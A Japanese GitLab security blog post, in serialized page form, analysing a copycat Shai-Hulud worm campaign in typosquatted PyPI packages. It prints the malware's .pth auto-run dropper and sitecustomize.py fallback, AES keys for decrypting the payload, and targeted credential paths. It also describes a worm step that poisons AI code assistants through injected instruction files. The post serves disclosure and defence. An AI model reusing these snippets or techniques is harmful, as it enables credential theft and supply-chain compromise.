[{"data":1,"prerenderedAt":1807},["ShallowReactive",2],{"/ja-jp/blog/shai-hulud-copycat-campaign-targets-python-developers":3,"navigation-ja-jp":1027,"banner-ja-jp":1444,"footer-ja-jp":1453,"blog-post-authors-ja-jp-Dinesh Bolkensteyn|Daniel Abeles":1694,"blog-related-posts-ja-jp-shai-hulud-copycat-campaign-targets-python-developers":1721,"blog-promotions-ja-jp":1745,"next-steps-ja-jp":1798},{"id":4,"title":5,"authors":6,"body":9,"category":1006,"date":1007,"description":1008,"extension":1009,"externalUrl":1010,"featured":1011,"heroImage":1012,"meta":1013,"navigation":1011,"path":1014,"seo":1015,"slug":1019,"stem":1020,"tags":1021,"template":1024,"updatedDate":1025,"__hash__":1026},"blogPosts/ja-jp/blog/shai-hulud-copycat-campaign-targets-python-developers.md","PyPIタイポスクワッティングを悪用したShai-Hulud模倣攻撃、Python開発者を狙う",[7,8],"Dinesh Bolkensteyn","Daniel Abeles",{"type":10,"value":11,"toc":991},"minimark",[12,23,26,30,38,73,82,85,94,97,101,119,181,188,209,279,285,288,291,329,332,335,389,392,395,488,491,494,523,526,539,546,562,565,781,784,787,812,815,926,930,943,952,960,963,972,975,987],[13,14,15,16,22],"p",{},"GitLabの脆弱性リサーチチームは、PyPIを標的とした組織的なサプライチェーン攻撃を確認しました。この攻撃では、",[17,18,21],"a",{"href":19,"rel":20},"https://about.gitlab.com/ja-jp/blog/gitlab-discovers-widespread-npm-supply-chain-attack/",[],"Shai-Hulud","マルウェアのコピーが展開されています。悪意あるパッケージは5つ確認されており、Flask、Requests、NumPyを偽装したタイポスクワット4つと、武器化された正規プロジェクト1つが含まれます。これらのパッケージはインストール時にコードを実行し、インポートや関数呼び出しは不要です。また、自己増殖型の認証情報窃取ツールを内包しており、主要クラウドプロバイダー全般のCI/CD環境を標的としています。",[13,24,25],{},"GitLabが影響を受けるパッケージをいずれも使用していないことを確認しました。より広範なセキュリティコミュニティが適切に対応できるよう、調査結果を公開します。",[27,28,29],"h2",{"id":29},"攻撃の詳細",[13,31,32,33,37],{},"監視システムは、2026年6月7日、単一アカウント（",[34,35,36],"code",{},"elitexp","）から公開された悪意ある5つのPyPIパッケージを検知しました。そのうち4つはタイポスクワットです。",[39,40,41,57,65],"ul",{},[42,43,44,50,51,56],"li",{},[45,46,47],"strong",{},[34,48,49],{},"rlask"," と 
",[45,52,53],{},[34,54,55],{},"tlask","：Flaskのタイポスクワット",[42,58,59,64],{},[45,60,61],{},[34,62,63],{},"rsquests","：Requestsのタイポスクワット",[42,66,67,72],{},[45,68,69],{},[34,70,71],{},"nhmpy","：NumPyのタイポスクワット",[13,74,75,76,81],{},"5つ目の ",[45,77,78],{},[34,79,80],{},"mflux-streamlit"," は、実際のユーザーを持つ正規プロジェクトです。攻撃者はタイポスクワット展開後、悪意あるバージョン0.0.3および0.0.4を公開することで、このプロジェクトを武器化しました。",[13,83,84],{},"攻撃者はまず、本物の最新リリースのバージョン番号（Flask 3.1.3、Requests 2.34.2、NumPy 2.4.6）と完全に一致するクリーンな「プローブ」バージョンを公開しました。これらが問題なくインデックスされると、攻撃者はワームのペイロードを組み込んだ新しいバージョンを公開しました。",[13,86,87,88,93],{},"これは模倣による展開です。Shai-Huludの背後にある集団TeamPCPは、2026年5月12日にワームのコードを",[17,89,92],{"href":90,"rel":91},"https://ramimac.me/teampcp/",[],"オープンソース化しました","。以来、独立した攻撃者がこのツールキットを入手し、新たなターゲットを狙う動きを追跡してきました。今回のキャンペーンにより、同じワームがPythonエコシステムへも展開されました。",[27,95,96],{"id":96},"技術分析",[98,99,100],"h3",{"id":100},"初期感染ベクター",[13,102,103,104,107,108,111,112,114,115,118],{},"元のnpmバリアントは ",[34,105,106],{},"preinstall"," スクリプトを使用していました。このキャンペーンでは別のアプローチを採用し、Pythonの ",[34,109,110],{},".pth"," ファイルメカニズムを悪用しています。Wheelパッケージは ",[34,113,110],{}," ファイルを同梱でき、Pythonは起動時にこれを自動的に処理するため、明示的なインポートは不要です。各悪意あるパッケージには ",[34,116,117],{},"rlask-setup.pth"," のようなファイルが含まれており、1行のドロッパーが記述されています。",[120,121,126],"pre",{"className":122,"code":123,"language":124,"meta":125,"style":125},"language-py shiki shiki-themes github-light","import os as _O,tempfile as _T;_G=_O.path.join(_T.gettempdir(),\".bun_ran\");\n_O.path.exists(_G)or exec('import os as _o,subprocess as _s,urllib.request as _u...')\n","py","",[34,127,128,159],{"__ignoreMap":125},[129,130,133,137,141,144,147,149,152,156],"span",{"class":131,"line":132},"line",1,[129,134,136],{"class":135},"sD7c4","import",[129,138,140],{"class":139},"sgsFI"," os ",[129,142,143],{"class":135},"as",[129,145,146],{"class":139}," _O,tempfile ",[129,148,143],{"class":135},[129,150,151],{"class":139}," 
_T;_G=_O.path.join(_T.gettempdir(),",[129,153,155],{"class":154},"sYBdl","\".bun_ran\"",[129,157,158],{"class":139},");\n",[129,160,162,165,168,172,175,178],{"class":131,"line":161},2,[129,163,164],{"class":139},"_O.path.exists(_G)",[129,166,167],{"class":135},"or",[129,169,171],{"class":170},"sYu0t"," exec",[129,173,174],{"class":139},"(",[129,176,177],{"class":154},"'import os as _o,subprocess as _s,urllib.request as _u...'",[129,179,180],{"class":139},")\n",[13,182,183,184,187],{},"ドロッパーはシステムの一時ディレクトリ内のマーカーファイル（",[34,185,186],{},".bun_ran","）の存在を確認して再実行を防ぎ、次にGitHubからBun JavaScriptランタイムをダウンロードし、パッケージ内にバンドルされた5 MBの難読化されたJavaScriptペイロードを実行します。",[13,189,190,192,193,196,197,200,201,204,205,208],{},[34,191,49],{}," の初期バージョンには、バックアップの実行経路として ",[34,194,195],{},"sitecustomize.py"," ファイルも含まれていました。Pythonは起動時に ",[34,198,199],{},"sitecustomize"," を自動インポートし、このファイルは ",[34,202,203],{},"sys.path"," から隠し ",[34,206,207],{},"_index.js"," ペイロードを検索します。",[120,210,212],{"className":122,"code":211,"language":124,"meta":125,"style":125},"import subprocess, os, sys\nfor d in sys.path:\n  js = os.path.join(d, \"_index.js\")\n  if os.path.exists(js):\n    subprocess.run([\"node\", js])\n    break\n",[34,213,214,221,235,252,261,273],{"__ignoreMap":125},[129,215,216,218],{"class":131,"line":132},[129,217,136],{"class":135},[129,219,220],{"class":139}," subprocess, os, sys\n",[129,222,223,226,229,232],{"class":131,"line":161},[129,224,225],{"class":135},"for",[129,227,228],{"class":139}," d ",[129,230,231],{"class":135},"in",[129,233,234],{"class":139}," sys.path:\n",[129,236,238,241,244,247,250],{"class":131,"line":237},3,[129,239,240],{"class":139},"  js ",[129,242,243],{"class":135},"=",[129,245,246],{"class":139}," os.path.join(d, ",[129,248,249],{"class":154},"\"_index.js\"",[129,251,180],{"class":139},[129,253,255,258],{"class":131,"line":254},4,[129,256,257],{"class":135},"  if",[129,259,260],{"class":139}," 
os.path.exists(js):\n",[129,262,264,267,270],{"class":131,"line":263},5,[129,265,266],{"class":139},"    subprocess.run([",[129,268,269],{"class":154},"\"node\"",[129,271,272],{"class":139},", js])\n",[129,274,276],{"class":131,"line":275},6,[129,277,278],{"class":135},"    break\n",[13,280,281,282,284],{},"攻撃者は後のバージョンでこのバックアップメカニズムを削除し、",[34,283,110],{}," アプローチ単独で十分と判断したようです。",[98,286,287],{"id":287},"ペイロードの難読化",[13,289,290],{},"JavaScriptペイロードは3層で難読化されています。",[292,293,294,311,318],"ol",{},[42,295,296,297,300,301,304,305,307,308,310],{},"整数配列に適用された ",[45,298,299],{},"ROT-N文字暗号","（ローテーション値はパッケージによって異なります：",[34,302,303],{},"rlask@3.1.4"," はROT-13、",[34,306,63],{}," はROT-17、",[34,309,55],{}," はROT-25）",[42,312,313,314,317],{},"ハードコードされた鍵を使用した ",[45,315,316],{},"AES-128-GCM暗号化","（2つの暗号化ブロブを生成）",[42,319,320,321,324,325,328],{},"内部ペイロードへの標準的な ",[45,322,323],{},"変数名マングリング","（",[34,326,327],{},"_0x"," プレフィックス難読化）",[13,330,331],{},"コードを実行することなく、静的解析によってペイロードを復号しました。最初のブロブ（907バイト）はBunランタイムダウンローダーです。2番目のブロブ（772 KB）は完全なShai-Hulud認証情報窃取ツールで、2,538個のハードコードされた文字列を含んでいます。",[13,333,334],{},"独自に解析を行う研究者向けに、AES復号鍵を以下に示します。",[336,337,338,355],"table",{},[339,340,341],"thead",{},[342,343,344,349,352],"tr",{},[345,346,348],"th",{"align":347},"left","レイヤー",[345,350,351],{"align":347},"鍵",[345,353,354],{"align":347},"IV",[356,357,358,374],"tbody",{},[342,359,360,364,369],{},[361,362,363],"td",{"align":347},"Bunダウンローダー",[361,365,366],{"align":347},[34,367,368],{},"c95506221d18936328fbc7ddcd21e3dd",[361,370,371],{"align":347},[34,372,373],{},"48da5faeafac0ac88a410bb0",[342,375,376,379,384],{},[361,377,378],{"align":347},"ワームペイロード",[361,380,381],{"align":347},[34,382,383],{},"7557c4e782a0622159476d1ea10d5236",[361,385,386],{"align":347},[34,387,388],{},"55a7d25e0e61b77cc175bcc3",[98,390,391],{"id":391},"認証情報の収集",[13,393,394],{},"起動後、ワームは主要なクラウドおよびCI/CDプラットフォーム全般の認証情報を狙います。",[39,396,397,407,417,423,429,446,452,458,464,470,476,482],{},[42,398,399,402,403,406],{},[45,400,401],{},"GitHub 
Actions","：",[34,404,405],{},"GITHUB_TOKEN","、パーソナルアクセストークン、きめ細かいトークン、OIDCトークン、組織・リポジトリのシークレット、Actionsアーティファクト、Runnerプロセスメモリ",[42,408,409,412,413,416],{},[45,410,411],{},"AWS","：IAMアクセスキー、シークレットキー、セッショントークン、IMDSインスタンス認証情報（",[34,414,415],{},"169[.]254[.]169[.]254","）、Secrets Managerエントリ、SSMパラメータ、STS連携トークン",[42,418,419,422],{},[45,420,421],{},"Azure","：クライアントシークレット、マネージドIDトークン、Key Vaultシークレット、フェデレーテッド認証情報、Microsoft Graph APIトークン",[42,424,425,428],{},[45,426,427],{},"GCP","：サービスアカウントキー、アプリケーションデフォルト認証情報、クラウドプラットフォームスコープトークン",[42,430,431,434,435,438,439,438,442,445],{},[45,432,433],{},"HashiCorp Vault","：7つの既知のファイルシステムパス（",[34,436,437],{},"/var/run/secrets/vault-token","、",[34,440,441],{},"/etc/vault/token",[34,443,444],{},"/root/.vault-token"," など）からのVaultトークン、APIアクセス、Kubernetes Vault認証",[42,447,448,451],{},[45,449,450],{},"npm / JFrog","：npmトークン、JFrog/Artifactory APIキー、OIDCトークン交換",[42,453,454,457],{},[45,455,456],{},"PyPI","：公開トークン、OIDCミントトークン",[42,459,460,463],{},[45,461,462],{},"RubyGems","：APIキー、gem公開認証情報",[42,465,466,469],{},[45,467,468],{},"SSH","：ラテラルムーブメントのための秘密鍵",[42,471,472,475],{},[45,473,474],{},"Kubernetes","：サービスアカウントトークン、kubeconfigファイル",[42,477,478,481],{},[45,479,480],{},"Sigstore","：OIDCトークンとFulcio署名証明書（攻撃者が信頼されたIDでアーティファクトに署名可能になります）",[42,483,484,487],{},[45,485,486],{},"データベース","：MongoDB、MySQL、PostgreSQL、Redisのパスワードが埋め込まれた接続文字列",[98,489,490],{"id":490},"自己増殖",[13,492,493],{},"元のnpmバリアントと同様に、これは単なる窃取ツールではありません。自己増殖します。窃取した認証情報を使用して、ワームは以下の動作を行います。",[39,495,496,503,509,512,515],{},[42,497,498,499,502],{},"アクセス可能なGitHubリポジトリに ",[34,500,501],{},".github/setup.js"," とワークフローファイルをコミットし、他のCIパイプラインでワームを再実行させます",[42,504,505,508],{},[34,506,507],{},".github/copilot-instructions.md"," 
を注入してAIコードアシスタントを汚染します",[42,510,511],{},"窃取したレジストリトークンを使用して、PyPI、npm、RubyGemsに追加の汚染パッケージを公開します",[42,513,514],{},"sudoersルールを注入してセルフホスト型CIランナーへの権限昇格を試みます",[42,516,517,522],{},[17,518,521],{"href":519,"rel":520},"https://github.com/step-security/harden-runner",[],"StepSecurityのharden-runner","の存在を確認し、検出された場合は動作を変更します",[98,524,525],{"id":525},"攻撃者について",[13,527,528,529,531,532,534,535,538],{},"5つのパッケージはすべてPyPIアカウント ",[34,530,36],{}," が所有しています。このアカウントは2024年11月に正規パッケージ（",[34,533,80],{},"：GitHubに11スターを持つStreamlit製画像生成UI）とともに作成されました。関連するGitHubアカウント（",[34,536,537],{},"github[.]com/elitexp","）は13年以上前に作成されており、大学のコースワークやLaravelプロジェクトを含む43の公開リポジトリを持っています。",[13,540,541,542,545],{},"アップロードメタデータによると、すべてのパッケージはユーザーエージェントとして ",[34,543,544],{}," を使用して公開されています。Bunは、マルウェアが実行チェーンの一部としてダウンロードするランタイムと同じものです。ただし、「侵害の痕跡」の表に記載されたダウンロードURLが指すのはbun-v1.3.13であり、このユーザーエージェントのバージョンとは一致しません。検知ルールではバージョンを固定せず、両方を対象にしてください。",[13,547,548,549,551,552,555,556,558,559,561],{},"攻撃者は ",[34,550,80],{}," 自体も武器化しました。バージョン0.0.1と0.0.2はクリーンですが、タイポスクワットキャンペーンの後、15:23と15:37 UTCに公開された ",[45,553,554],{},"バージョン0.0.3と0.0.4"," には、同じ ",[34,557,110],{}," ドロッパーと難読化されたペイロードが含まれています。これにより、典型的なタイポスクワットよりも危険な攻撃となっています。",[34,560,80],{}," は既存ユーザーを持つ実在のプロジェクトであり、これらのユーザーは通常の依存関係解決を通じて汚染されたアップデートを受け取る可能性があります。",[27,563,564],{"id":564},"侵害の痕跡",[336,566,567,580],{},[339,568,569],{},[342,570,571,574,577],{},[345,572,573],{"align":347},"種別",[345,575,576],{"align":347},"インジケーター",[345,578,579],{"align":347},"説明",[356,581,582,595,606,618,630,642,659,673,685,696,709,721,733,745,757,770],{},[342,583,584,587,592],{},[361,585,586],{"align":347},"package",[361,588,589,591],{"align":347},[34,590,49],{}," 3.1.4-3.1.7",[361,593,594],{"align":347},"悪意あるFlaskタイポスクワット",[342,596,597,599,604],{},[361,598,586],{"align":347},[361,600,601,603],{"align":347},[34,602,55],{}," 3.1.4",[361,605,594],{"align":347},[342,607,608,610,615],{},[361,609,586],{"align":347},[361,611,612,614],{"align":347},[34,613,63],{}," 
2.34.3",[361,616,617],{"align":347},"悪意あるRequestsタイポスクワット",[342,619,620,622,627],{},[361,621,586],{"align":347},[361,623,624,626],{"align":347},[34,625,71],{}," 2.4.7",[361,628,629],{"align":347},"悪意あるNumPyタイポスクワット",[342,631,632,634,639],{},[361,633,586],{"align":347},[361,635,636,638],{"align":347},[34,637,80],{}," 0.0.3, 0.0.4",[361,640,641],{"align":347},"武器化された正規パッケージ",[342,643,644,647,652],{},[361,645,646],{"align":347},"file",[361,648,649],{"align":347},[34,650,651],{},"{package}-setup.pth",[361,653,654,655,658],{"align":347},"自動実行ドロッパー（SHA256: ",[34,656,657],{},"6506d317...","）",[342,660,661,663,667],{},[361,662,646],{"align":347},[361,664,665],{"align":347},[34,666,195],{},[361,668,669,670,672],{"align":347},"バックアップ自動実行（",[34,671,49],{}," のみ存在）",[342,674,675,677,682],{},[361,676,646],{"align":347},[361,678,679],{"align":347},[34,680,681],{},"{package}/_index.js",[361,683,684],{"align":347},"難読化されたワームペイロード（5.2 MB）",[342,686,687,689,693],{},[361,688,646],{"align":347},[361,690,691],{"align":347},[34,692,186],{},[361,694,695],{"align":347},"システム一時ディレクトリ内の実行マーカー",[342,697,698,701,706],{},[361,699,700],{"align":347},"network",[361,702,703],{"align":347},[34,704,705],{},"hxxps[://]github[.]com/oven-sh/bun/releases/download/bun-v1.3.13/bun-{os}-{arch}.zip",[361,707,708],{"align":347},"Bunランタイムのダウンロード",[342,710,711,713,718],{},[361,712,700],{"align":347},[361,714,715],{"align":347},[34,716,717],{},"hxxps[://]upload[.]pypi[.]org/legacy/",[361,719,720],{"align":347},"ワームによる汚染PyPIパッケージの公開",[342,722,723,725,730],{},[361,724,700],{"align":347},[361,726,727],{"align":347},[34,728,729],{},"hxxp[://]169[.]254[.]169[.]254/latest/meta-data/iam/security-credentials/",[361,731,732],{"align":347},"AWS IMDS認証情報の窃取",[342,734,735,737,742],{},[361,736,700],{"align":347},[361,738,739],{"align":347},[34,740,741],{},"hxxps[://]login[.]microsoftonline[.]com/",[361,743,744],{"align":347},"Azure 
ADトークンの取得",[342,746,747,749,754],{},[361,748,700],{"align":347},[361,750,751],{"align":347},[34,752,753],{},"hxxps[://]fulcio[.]sigstore[.]dev",[361,755,756],{"align":347},"Sigstore証明書のリクエスト",[342,758,759,762,767],{},[361,760,761],{"align":347},"actor",[361,763,764,766],{"align":347},[34,765,36],{}," (PyPI)",[361,768,769],{"align":347},"パッケージ所有者",[342,771,772,774,778],{},[361,773,761],{"align":347},[361,775,776],{"align":347},[34,777,544],{},[361,779,780],{"align":347},"アップロード時のユーザーエージェント",[27,782,783],{"id":783},"影響を受けた場合の対処法",[13,785,786],{},"これらのパッケージのいずれかがお使いの環境にインストールされている場合：",[292,788,789,795,798,806,809],{},[42,790,791,792,794],{},"パッケージを直ちに削除し、システムの一時ディレクトリ内の ",[34,793,186],{}," マーカーファイルの有無を確認してください。このファイルが存在する場合、ドロッパーがすでに実行された可能性があります。一時ディレクトリは消去されることがあるため、ファイルが存在しなくても未実行とは断定できません。",[42,796,797],{},"パッケージがインストールされた環境でアクセス可能だったすべての認証情報をローテーションしてください。CI/CDトークン、クラウドプロバイダーの認証情報、SSHキー、レジストリ公開トークンが含まれます。",[42,799,800,801,438,803,805],{},"GitHubリポジトリで予期しないコミット（特に ",[34,802,501],{},[34,804,507],{},"、または変更されたワークフローファイルに一致するもの）を監査してください。",[42,807,808],{},"パッケージレジストリアカウント（PyPI、npm、RubyGems）で公開していないパッケージがないか確認してください。",[42,810,811],{},"CI/CDパイプラインのログで予期しないBunのダウンロードやJavaScriptの実行がないか確認してください。",[27,813,814],{"id":814},"タイムライン",[336,816,817,827],{},[339,818,819],{},[342,820,821,824],{},[345,822,823],{"align":347},"日時",[345,825,826],{"align":347},"イベント",[356,828,829,837,851,862,870,878,889,897,905,918],{},[342,830,831,834],{},[361,832,833],{"align":347},"2026-05-12",[361,835,836],{"align":347},"TeamPCPがShai-Huludワームをオープンソース化",[342,838,839,842],{},[361,840,841],{"align":347},"2026-06-07 13:47 UTC",[361,843,844,845,438,848,658],{"align":347},"プローブバージョン公開（",[34,846,847],{},"rlask@3.1.3",[34,849,850],{},"rsquests@2.34.2",[342,852,853,856],{},[361,854,855],{"align":347},"2026-06-07 14:20 UTC",[361,857,858,859,861],{"align":347},"最初の悪意あるバージョン（",[34,860,303],{},"）を28秒以内に検知",[342,863,864,867],{},[361,865,866],{"align":347},"2026-06-07 14:24 UTC",[361,868,869],{"align":347},"自動解析完了、悪意あり/重大として分類",[342,871,872,875],{},[361,873,874],{"align":347},"2026-06-07 
14:27-15:04 UTC",[361,876,877],{"align":347},"4つのパッケージ名全体でさらに6つの悪意あるバージョンが公開",[342,879,880,883],{},[361,881,882],{"align":347},"2026-06-07 15:23-15:37 UTC",[361,884,885,886,888],{"align":347},"攻撃者が自身の正規パッケージ ",[34,887,80],{}," を武器化（v0.0.3、v0.0.4）",[342,890,891,894],{},[361,892,893],{"align":347},"2026-06-07",[361,895,896],{"align":347},"静的解析により完全なShai-Huludワームを確認",[342,898,899,902],{},[361,900,901],{"align":347},"2026-06-07 16:01 UTC",[361,903,904],{"align":347},"すべての悪意あるパッケージをPyPIセキュリティチームに報告",[342,906,907,910],{},[361,908,909],{"align":347},"2026-06-08 03:15:06 UTC",[361,911,912,917],{"align":347},[17,913,916],{"href":914,"rel":915},"https://advisories.gitlab.com/",[],"GitLab Advisory Database","にアドバイザリを追加",[342,919,920,923],{},[361,921,922],{"align":347},"2026-06-08",[361,924,925],{"align":347},"PyPIが悪意あるパッケージのすべてのリリースを削除",[27,927,929],{"id":928},"gitlabを活用したパッケージの検出方法","GitLabを活用したパッケージの検出方法",[13,931,932,933,938,939,942],{},"GitLab Ultimateをご利用の場合、",[17,934,937],{"href":935,"rel":936},"https://docs.gitlab.com/ja-jp/user/application_security/dependency_scanning/",[],"Dependency Scanning","を使用して、プロジェクト内のこれらのパッケージへの露出を自動的に検出できます。",[17,940,916],{"href":914,"rel":941},[],"に、5つのパッケージすべてを対象とするアドバイザリ（GMS-2026-572〜GMS-2026-576）を申請しています。マージされると、Dependency Scanningが有効なプロジェクトのパイプライン結果と脆弱性レポートにこれらのパッケージがフラグ表示されます。",[13,944,945,946,951],{},"複数のリポジトリを管理するチームには、Security Analyst Agentを備えた",[17,947,950],{"href":948,"rel":949},"https://docs.gitlab.com/ja-jp/user/gitlab_duo_chat/",[],"GitLab Duo Chat","を使用した迅速なトリアージをお勧めします。次のような質問を試してください。",[39,953,954,957],{},[42,955,956],{},"「Shai-Hulud PyPIキャンペーンの影響を受けている依存関係はありますか？」",[42,958,959],{},"「このプロジェクトに悪意あるPython依存関係はありますか？」",[27,961,962],{"id":962},"今後の見通し",[13,964,965,966,968,969,971],{},"TeamPCPが5月にShai-Huludワームをオープンソース化した後、このキャンペーンを予測していました。独立した攻撃者がツールキットを入手し、新たなエコシステムに展開しています。Pythonバリアントは異なる初期感染ベクター（",[34,967,106],{}," スクリプトではなく ",[34,970,110],{}," 
ファイル）を使用していますが、同じ認証情報収集および自己増殖のコードを内包しています。",[13,973,974],{},"監視システムはnpm、PyPI、その他のレジストリ全般での模倣展開を継続して追跡しています。新たな情報が入り次第、この記事を更新します。",[976,977,978],"blockquote",{},[13,979,980,981,986],{},"脆弱性リサーチチームのその他の記事は、",[17,982,985],{"href":983,"rel":984},"https://about.gitlab.com/ja-jp/blog/categories/security-labs/",[],"Security Labsサイト","でご覧いただけます。",[988,989,990],"style",{},"html pre.shiki code .sD7c4, html code.shiki .sD7c4{--shiki-default:#D73A49}html pre.shiki code .sgsFI, html code.shiki .sgsFI{--shiki-default:#24292E}html pre.shiki code .sYBdl, html code.shiki .sYBdl{--shiki-default:#032F62}html pre.shiki code .sYu0t, html code.shiki .sYu0t{--shiki-default:#005CC5}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: 
var(--shiki-default-text-decoration);}",{"title":125,"searchDepth":161,"depth":161,"links":992},[993,994,1001,1002,1003,1004,1005],{"id":29,"depth":161,"text":29},{"id":96,"depth":161,"text":96,"children":995},[996,997,998,999,1000],{"id":100,"depth":237,"text":100},{"id":287,"depth":237,"text":287},{"id":391,"depth":237,"text":391},{"id":490,"depth":237,"text":490},{"id":525,"depth":237,"text":525},{"id":564,"depth":161,"text":564},{"id":783,"depth":161,"text":783},{"id":814,"depth":161,"text":814},{"id":928,"depth":161,"text":929},{"id":962,"depth":161,"text":962},"security-labs","2026-06-09","GitLabの脆弱性リサーチチームが、PyPIを標的とした新たなPythonサプライチェーン攻撃を発見しました。悪意あるパッケージがShai-Huludワームを展開し、主要なクラウドプロバイダーのCI/CDシステムから認証情報を窃取します。","md",null,true,"https://res.cloudinary.com/about-gitlab-com/image/upload/v1772630163/akp8ly2mrsfrhsb0liyb.png",{},"/ja-jp/blog/shai-hulud-copycat-campaign-targets-python-developers",{"config":1016,"title":5,"ogImage":1018,"description":1008},{"noIndex":1017},false,"https://res.cloudinary.com/about-gitlab-com/image/upload/f_auto,q_auto,c_lfill/v1772630163/akp8ly2mrsfrhsb0liyb.webp","shai-hulud-copycat-campaign-targets-python-developers","ja-jp/blog/shai-hulud-copycat-campaign-targets-python-developers",[1022,1023],"security","security releases","BlogPost","2026-06-10","678FGu748nrakVHG3l2-lullt-ODiZtOImpqBMfBr3A",{"logo":1028,"freeTrial":1033,"sales":1038,"login":1043,"items":1048,"search":1364,"minimal":1397,"duo":1414,"switchNav":1423,"pricingDeployment":1434},{"config":1029},{"href":1030,"dataGaName":1031,"dataGaLocation":1032},"/ja-jp/","gitlab logo","header",{"text":1034,"config":1035},"無料トライアルを開始",{"href":1036,"dataGaName":1037,"dataGaLocation":1032},"https://gitlab.com/-/trial_registrations/new?glm_source=about.gitlab.com/ja-jp&glm_content=default-saas-trial/","free 
delivery",{"text":1150,"config":1597},{"href":1152,"dataGaName":1598,"dataGaLocation":1461},"value stream management",{"text":1542,"config":1600},{"href":1601,"dataGaName":1545,"dataGaLocation":1461},"/ja-jp/solutions/gitops/",{"text":1603,"config":1604},"エンタープライズ",{"href":1166,"dataGaName":1167,"dataGaLocation":1461},{"text":1169,"config":1606},{"href":1172,"dataGaName":1173,"dataGaLocation":1461},{"text":1608,"config":1609},"公共機関",{"href":1178,"dataGaName":1179,"dataGaLocation":1461},{"text":1611,"config":1612},"教育",{"href":1613,"dataGaName":1614,"dataGaLocation":1461},"/ja-jp/solutions/education/","education",{"text":1616,"config":1617},"金融サービス",{"href":1618,"dataGaName":1619,"dataGaLocation":1461},"/ja-jp/solutions/finance/","financial services",{"title":1621,"links":1622},"リソース",[1623,1625,1627,1629,1633,1635,1638,1640,1642,1644,1646,1648,1650],{"text":1199,"config":1624},{"href":1201,"dataGaName":1202,"dataGaLocation":1461},{"text":1204,"config":1626},{"href":1206,"dataGaName":1207,"dataGaLocation":1461},{"text":1209,"config":1628},{"href":1211,"dataGaName":1212,"dataGaLocation":1461},{"text":1214,"config":1630},{"href":1631,"dataGaName":1632,"dataGaLocation":1461},"https://docs.gitlab.com/ja-jp/","docs",{"text":1237,"config":1634},{"href":1239,"dataGaName":1240,"dataGaLocation":1461},{"text":1636,"config":1637},"新着情報",{"href":1286,"dataGaName":1287,"dataGaLocation":1461},{"text":1232,"config":1639},{"href":1234,"dataGaName":1235,"dataGaLocation":1461},{"text":1246,"config":1641},{"href":1248,"dataGaName":1249,"dataGaLocation":1461},{"text":1254,"config":1643},{"href":1256,"dataGaName":1257,"dataGaLocation":1461},{"text":1259,"config":1645},{"href":1261,"dataGaName":1262,"dataGaLocation":1461},{"text":1264,"config":1647},{"href":1266,"dataGaName":1267,"dataGaLocation":1461},{"text":826,"config":1649},{"href":1270,"dataGaName":1271,"dataGaLocation":1461},{"text":1273,"config":1651},{"href":1275,"dataGaName":1276,"dataGaLocation":1461},{"title":1653,"links":1654
},"会社情報",[1655,1657,1659,1661,1663,1665,1669,1674,1676,1678,1680],{"text":1297,"config":1656},{"href":1299,"dataGaName":1291,"dataGaLocation":1461},{"text":1302,"config":1658},{"href":1304,"dataGaName":1305,"dataGaLocation":1461},{"text":1310,"config":1660},{"href":1312,"dataGaName":1313,"dataGaLocation":1461},{"text":1315,"config":1662},{"href":1317,"dataGaName":1318,"dataGaLocation":1461},{"text":1320,"config":1664},{"href":1322,"dataGaName":1323,"dataGaLocation":1461},{"text":1666,"config":1667},"Sustainability",{"href":1668,"dataGaName":1666,"dataGaLocation":1461},"/sustainability/",{"text":1670,"config":1671},"ダイバーシティ、インクルージョン、ビロンギング（DIB）",{"href":1672,"dataGaName":1673,"dataGaLocation":1461},"/ja-jp/diversity-inclusion-belonging/","Diversity, inclusion and belonging",{"text":1325,"config":1675},{"href":1327,"dataGaName":1328,"dataGaLocation":1461},{"text":1335,"config":1677},{"href":1337,"dataGaName":1338,"dataGaLocation":1461},{"text":1340,"config":1679},{"href":1342,"dataGaName":1343,"dataGaLocation":1461},{"text":1681,"config":1682},"現代奴隷制の透明性に関する声明",{"href":1683,"dataGaName":1684,"dataGaLocation":1461},"https://handbook.gitlab.com/handbook/legal/modern-slavery-act-transparency-statement/","modern slavery transparency 
statement",{"items":1686},[1687,1689,1692],{"text":1509,"config":1688},{"href":1511,"dataGaName":1512,"dataGaLocation":1461},{"text":1690,"config":1691},"Cookieの設定",{"dataGaName":1521,"dataGaLocation":1461,"id":1522,"isOneTrustButton":1011},{"text":1514,"config":1693},{"href":1516,"dataGaName":1517,"dataGaLocation":1461},[1695,1709],{"id":1696,"title":7,"body":1010,"config":1697,"content":1699,"description":1010,"extension":1703,"meta":1704,"navigation":1011,"path":1705,"seo":1706,"stem":1707,"__hash__":1708},"blogAuthors/en-us/blog/authors/dinesh-bolkensteyn.yml",{"template":1698},"BlogAuthor",{"name":7,"config":1700},{"headshot":1701,"ctfId":1702},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1781016491/cs30c757njvhqnyizzmn.jpg","EpylYWgjPmFOL5NX3Zxmk","yml",{},"/en-us/blog/authors/dinesh-bolkensteyn",{},"en-us/blog/authors/dinesh-bolkensteyn","Pv3nFIJV4WoNXz6FcpkaLOBx8QTtXH1KIVGmxt1GGME",{"id":1710,"title":8,"body":1010,"config":1711,"content":1713,"description":1010,"extension":1703,"meta":1716,"navigation":1011,"path":1717,"seo":1718,"stem":1719,"__hash__":1720},"blogAuthors/en-us/blog/authors/daniel-abeles.yml",{"template":1698,"gitlabHandle":1712},"dabeles",{"name":8,"config":1714},{"headshot":1715},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1764021550/s0jlolynjykik4qzfznr.png",{},"/en-us/blog/authors/daniel-abeles",{},"en-us/blog/authors/daniel-abeles","Jk9qNn2qJBh633zCEZSFpYFUYNt83twJ-Ge9wrn_oT0",[1722,1730,1737],{"title":1723,"description":1724,"heroImage":1725,"category":1006,"date":1726,"authors":1727,"slug":1729,"externalUrl":1010},"GitLab CI/CDとDuoで自動検知テストフレームワークを構築する","GitLabのSignals Engineeringチームが構築したWATCHフレームワークを通じて、セキュリティ監視パイプラインを継続的に検証する方法をご紹介します。","https://res.cloudinary.com/about-gitlab-com/image/upload/v1772195014/ooezwusxjl1f7ijfmbvj.png","2026-04-30",[1728],"Evan 
